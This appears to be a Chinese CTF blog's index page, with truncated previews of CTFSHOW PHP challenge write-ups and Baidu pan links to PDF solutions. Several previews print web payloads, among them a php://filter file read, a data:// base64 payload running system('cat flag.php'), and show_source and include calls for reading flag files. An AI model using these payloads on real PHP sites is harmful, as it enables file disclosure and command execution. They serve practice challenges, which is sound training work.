Firebasky的博客

hhh 还是懒链接：https://pan.baidu.com/s/1jAxmXznCWTm0UdXPc8VvCg提取码：m9bw复制这段内容后打开百度网盘手机App，操作更方便哦

前段时间太忙啦，就没有发。但是羽师傅也发了呢CTFSHOW PHP特性篇（中篇 111-131）CTFSHOW PHP特性篇 （下篇132-150）我就不写博客啦，还是发pdf吧，需要的可以下载链接：https://pan.baidu.com/s/1YnkfV5wfCqPFr2HW1MwUEg提取码：c0gf复制这段内容后打开百度网盘手机App，操作更方便哦...

1. web78PHP伪协议读取?file=php://filter/convert.base64-encode/resource=flag.php2. web79?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');然后查看源代码3. web80-

前面的一篇文章和这道题一样的做法无字母数字的命令执行(ctfshow web入门 55）需要注意的是：每次上传的文件不一定有大写的文件名，需要多上传几次

这道题是之后群主直接放了payload其实比较困难，下面就是自己的分析源代码<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-05 20:49:30# @Last Modified by: h1xa# @Last Modified time: 2020-09-08 01:02:56# @email: h1xa@ctfer.com# @link: https://ctfer.com*/// .

1. web58-65payload：c=show_source('flag.php');2. web661.查看flag文件c=print_r(scandir("/"));c=highlight_file('/flag.txt');3. web67盲猜c=highlight_file('/flag.txt');4. web68-70尝试include('index.php');发现字节太大了 直接盲猜c=include('/flag.txt');5. web71<?php

一切看起来都那么合情合理这道题是羽师傅和atao师傅建议我去做的，最开始自己下载了源代码进行参考，发现里面有好多代码就放弃了，过了几天才去看有一个hint。分析了好久才发现自己之前做过类似的题，考察的知识点也是一样的。于是自己又来记录一下还有就是感谢羽师傅和atao师傅的建议羽师傅博客atao师傅博客这里我就不详细介绍知识点啦，因为之前自己也总结过，师傅们也写过该知识点https://blog.youkuaiyun.com/qq_46091464/article/details/108006422h

这次的这个比赛中的web是我和羽师傅还有m3w师傅一起出的，一人一道。其中最喜欢的是web3 羽师傅出的，真的太有意思啦。感谢羽师傅呢。还有web1让自己复习序列化知识，感谢m3w师傅呢web1_此夜圆<?phperror_reporting(0);class a{ public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname;.

好久之前写在本地的，因为累了就不重新写博客啦打印成pdf，需要的下载吧链接：https://pan.baidu.com/s/18E-2RwOt5oWqiWF3E4ZVmg提取码：dg4w

加上了羽师傅，本文的新姿势都是通过羽师傅提供的，非常感谢之前的方法下面是羽师傅提供的方法<?php/*# -*- coding: utf-8 -*-# @Author: Lazzaro# @Date: 2020-09-05 20:49:30# @Last Modified by: h1xa# @Last Modified time: 2020-09-07 20:03:51# @email: h1xa@ctfer.com# @link: https://ctfer.co.

这几天都没有怎么学习，基本上都是复习学科知识，因为我们要期末考试。刚刚好今天有时间来做了一道命令执行的题，再一次拜读了 p神的文章。受益匪浅。直接进入正题源代码<?php/*# -*- coding: utf-8 -*-# @Author: Lazzaro# @Date: 2020-09-05 20:49:30# @Last Modified by: h1xa# @Last Modified time: 2020-09-07 20:03:51# @email: h1x.

参加了ctfshow组织的菜鸡杯,自我感觉还是比较不错的,让自己学习了好多新东西。还有感谢师傅们的耐心解答。真的真的感谢。1. misc3这道题考察的是jsfuck编码(参考)，直接将编码放入浏览器的控制台进行解码。需要去掉最后的括号2. misc1这道题让自己学习了好多。一个是crc校验循环冗余校验，另一个是斐波那契数列脚本读取文件。斐波那契数列下载文件，里面是一张照片参考信息，可能是照片的长宽高隐写，这里可以使用crc暴力破解的脚本。参考链接import zlibimport str.

直接上题目 <?php if(isset($_GET['cmd'])){ $cmd=$_GET['cmd']; highlight_file(__FILE__); if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){ die("cerror"); } if(preg_ma

首先感谢ctfshow平台提供的题，需要越来越好其实这些wp,自己早就写好了放在本地，因为懒了就不重新写博客啦如果里面有不懂的或者错误的欢迎师傅们指出，共同学习。链接：https://pan.baidu.com/s/1sDlPRoIX5ozpuYjoutDSxw提取码：oexj复制这段内容后打开百度网盘手机App，操作更方便哦...

首先感谢ctfshow平台提供的题，需要越来越好其实这些wp,自己早就写好了放在本地，因为懒了就不重新写博客啦如果里面有不懂的或者错误的欢迎师傅们指出，共同学习。链接：https://pan.baidu.com/s/1aIKPTjAXljUH0dsMExNSeg提取码：m0kf复制这段内容后打开百度网盘手机App，操作更方便哦...

首先还是非常感谢群主大大和师傅们。希望ctfshow平台越来越好，做大做强做辉煌。链接：https://pan.baidu.com/s/12-uMIjaIDllXx4STQIbm5w提取码：kr4g复制这段内容后打开百度网盘手机App，操作更方便哦...

在之前ctfshow平台的萌新22，大家都认为是无解的，题目也介绍了"还能搞，阿呆表示将直播倒立放水"。但是在级客巅峰结束的那天晚上，群里的师傅介绍说，如果修改了php.ini里面的配置(register_argc_argv)可以做出来。最后是真的做出来了。使用阿呆~~~？下面是自己的思考，感谢Guoke师傅和ha1c9on师傅的帮助一. 源代码<?phpif(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_mat.